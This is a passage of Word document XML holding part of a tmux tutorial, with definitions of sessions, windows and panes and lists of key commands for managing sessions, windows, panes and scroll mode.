      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A collection of </w:t>
      </w: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windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Window</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A single terminal screen within a session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pane</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A split terminal within a window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C12">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Key Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C13">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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uses a prefix (default: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followed by a command.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> For example,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followed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates a new window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prefix key</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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C15">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Session Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detach: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d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename session: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C18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch sessions: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s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete a session:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While inside the Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="6aa84f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outside you are outside tmux (target session is detached)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1059"/>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tmux kill-session -t session_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete all active sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux kill-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if the Session is Deleted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C22">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Window Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New window: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c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch windows: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n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (next) or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p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (previous)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to a specific window: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the window number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Close window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>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&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C28">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pane Commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Split horizontally: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 (double quote)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Split vertically: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C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch panes: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arrow keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resize panes: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hold </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use arrow keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Close pane: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x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C2F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To enter Scroll Mode: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C31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can start scrolling using the wheel on the mouse, or using arrows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To quit Scroll Mode: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3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35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Customizing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C37">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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can be customized via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
